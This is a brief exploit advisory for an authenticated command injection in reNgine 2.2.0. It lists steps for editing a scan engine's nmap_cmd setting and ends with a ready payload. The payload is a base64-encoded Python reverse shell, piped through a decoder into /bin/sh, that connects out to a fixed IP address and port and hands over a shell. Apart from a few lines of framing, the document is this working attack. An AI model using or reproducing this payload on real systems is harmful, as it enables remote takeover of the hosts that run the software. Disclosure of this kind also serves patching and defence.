Headline
reNgine 2.2.0 Command Injection
reNgine version 2.2.0 suffers from an authenticated command injection vulnerability.
# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)# Date: 2024-09-29# Exploit Author: Caner Tercan# Vendor Homepage: https://rengine.wiki/# Software Link: https://github.com/yogeshojha/rengine# Version: v2.2.0# Tested on: macOSPOC : 1. Login the Rengine Platform2. Click the Scan Engine3. Modify any Scan Engine4. I modified nmap_cmd parameters on yml config5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.payload :'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #’